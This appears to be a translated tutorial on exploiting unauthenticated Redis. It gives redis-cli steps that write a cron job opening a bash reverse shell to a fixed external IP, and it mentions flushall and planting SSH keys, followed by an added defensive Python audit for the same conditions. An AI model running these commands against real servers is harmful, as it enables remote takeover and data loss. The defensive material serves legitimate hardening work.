Background
A default Redis installation accepts connections only from the local machine and has no password set.
Most companies' applications need several servers to access Redis, so operations staff change the bind address in /etc/redis.conf to 0.0.0.0, which leaves Redis reachable from the external network anonymously (no password required).
The problem that external access causes is Redis data leakage; at this point it still cannot be exploited directly.
But if Redis is started under the root account, it can lead to getting a shell.
Exploitation method
Through the Redis CONFIG command you can write to an arbitrary file; with sufficient permissions you can write a scheduled task (cron job) that sends back a reverse shell.
# Connect to Redis
redis-cli -h your_redis_server
# Keep the write clean by erasing the original data (not recommended if it is someone else's machine)
# flushall
# Set key 0 to a bash reverse shell script that runs every minute; listen on port 7890 on your own server (nc -vvl 7890)
set 0 "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/103.21.140.84/7890 0>&1\n\n"
# Set the directory to save to
config set dir /var/spool/cron/
# Set the saved file name
config set dbfilename root
# Save
save
Other exploitation approaches
Besides writing a scheduled task directly to get a shell, there are several other approaches.
Write a cron entry that sends back a shell
Write ~/.ssh/authorized_keys and log in directly with the key
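The following is an added example, not part of the original article: a defender-side check for the preconditions listed under Background (bind 0.0.0.0, no password, root account, CONFIG usable) and for the artifact the write leaves behind, since a file produced by SAVE in /var/spool/cron/ or as ~/.ssh/authorized_keys begins with the RDB magic header. The function names, the sample config and the sample bytes are constructed for illustration; the rename-command check is an assumption about how CONFIG is restricted and is not named in the article.

```python
import re

# Constructed sample config (not from a real host): the state described above.
SAMPLE_CONF = "# constructed\nbind 0.0.0.0\nport 6379\n"

def parse_conf(text):
    """Return {directive: [argument lists]} from redis.conf text."""
    conf = {}
    for raw in text.splitlines():
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf

def audit(text, run_user):
    """List which of the page's preconditions hold for this config and user."""
    conf = parse_conf(text)
    findings = []
    binds = [a.lstrip("-") for args in conf.get("bind", []) for a in args]
    if any(a in ("0.0.0.0", "*", "::", "::*") for a in binds):
        findings.append("bind exposes Redis on all interfaces")
    passwords = [args[0].strip("\"'") for args in conf.get("requirepass", []) if args]
    if not passwords or not passwords[-1]:
        findings.append("requirepass is not set (anonymous access)")
    # Assumption: CONFIG is restricted via rename-command (ACLs are not parsed here).
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        findings.append("CONFIG is available to any client")
    if run_user == "root":
        findings.append("redis-server runs as root")
    return findings

def looks_like_rdb_dump(data):
    """True if bytes begin with the RDB magic: 'REDIS' plus a 4-digit version."""
    return re.match(rb"REDIS\d{4}", data) is not None

if __name__ == "__main__":
    for finding in audit(SAMPLE_CONF, "root"):
        print("FINDING:", finding)
    # Constructed bytes imitating a dump saved as /var/spool/cron/root.
    print(looks_like_rdb_dump(b"REDIS0009\xfa\tredis-ver\x055.0.7"))
```

Feed looks_like_rdb_dump the first bytes of each file under /var/spool/cron/ and of each authorized_keys file; a legitimate crontab or key file never starts with that header.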